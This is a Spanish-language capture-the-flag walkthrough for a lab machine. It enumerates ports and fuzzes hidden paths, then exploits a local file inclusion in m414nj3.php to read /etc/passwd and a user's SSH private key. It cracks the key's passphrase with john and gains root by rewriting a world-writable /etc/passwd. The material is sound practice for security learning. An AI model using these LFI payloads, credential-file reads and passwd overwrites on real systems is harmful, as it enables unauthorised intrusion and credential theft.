Enumeramos puertos:
❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.186
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
...El robots.txt contiene un texto del que generamos un wordlist con cewl. Lo transformamos a leet (1337) y volvemos a fuzzear, encontrando rutas anidadas:
❯ cewl -m 3 'http://192.168.1.186/robots.txt' > ./wordlist.txt
❯ gobuster dir -u 'http://192.168.1.186' -w ./wordlist_leet.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh -r
...
/n3gr4 (Status: 200) [Size: 4]
...
❯ cat wordlist_leet.txt | tr '[:upper:]' '[:lower:]' > wordlist_leet_lower.txt
❯ gobuster dir -u 'http://192.168.1.186/n3gr4' -w ./wordlist_leet_lower.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh -r
...
/m414nj3.php (Status: 500) [Size: 0]
...Fuzzeamos el parámetro de m414nj3.php y damos con page, vulnerable a LFI:
❯ ffuf -u 'http://192.168.1.186/n3gr4/m414nj3.php?FUZZ=../../../../../../../../../../../../../etc/passwd' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fw 1
...
page [Status: 200, ...]
...
❯ curl 'http://192.168.1.186/n3gr4/m414nj3.php?page=/etc/passwd' | grep home
p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bashLeemos la id_rsa de p4l4nc4 y crackeamos su passphrase con john:
❯ curl 'http://192.168.1.186/n3gr4/m414nj3.php?page=/home/p4l4nc4/.ssh/id_rsa' -o id_rsa
❯ ssh2john.py id_rsa > hash
❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
friendster (id_rsa)
...
❯ ssh p4l4nc4@192.168.1.186 -i id_rsa
p4l4nc4@192.168.1.186's password: friendster
...
p4l4nc4@4ng014:~$Obtenemos la primera flag. Para escalar, /etc/passwd es escribible (Writable Critical Files Privesc):
p4l4nc4@4ng014:/tmp$ ls -l /etc/passwd
-rw-rw-rw- 1 root root 1066 Jan 24 10:55 /etc/passwdGeneramos un hash con perl y reemplazamos la contraseña de root:
❯ perl -e 'print crypt("1234","aa")'
aatxRPdZ/m52.
p4l4nc4@4ng014:/tmp$ nano /etc/passwd
p4l4nc4@4ng014:/tmp$ su root
Password: 1234
root@4ng014:/tmp#Obtenemos nuestra flag.
Fin.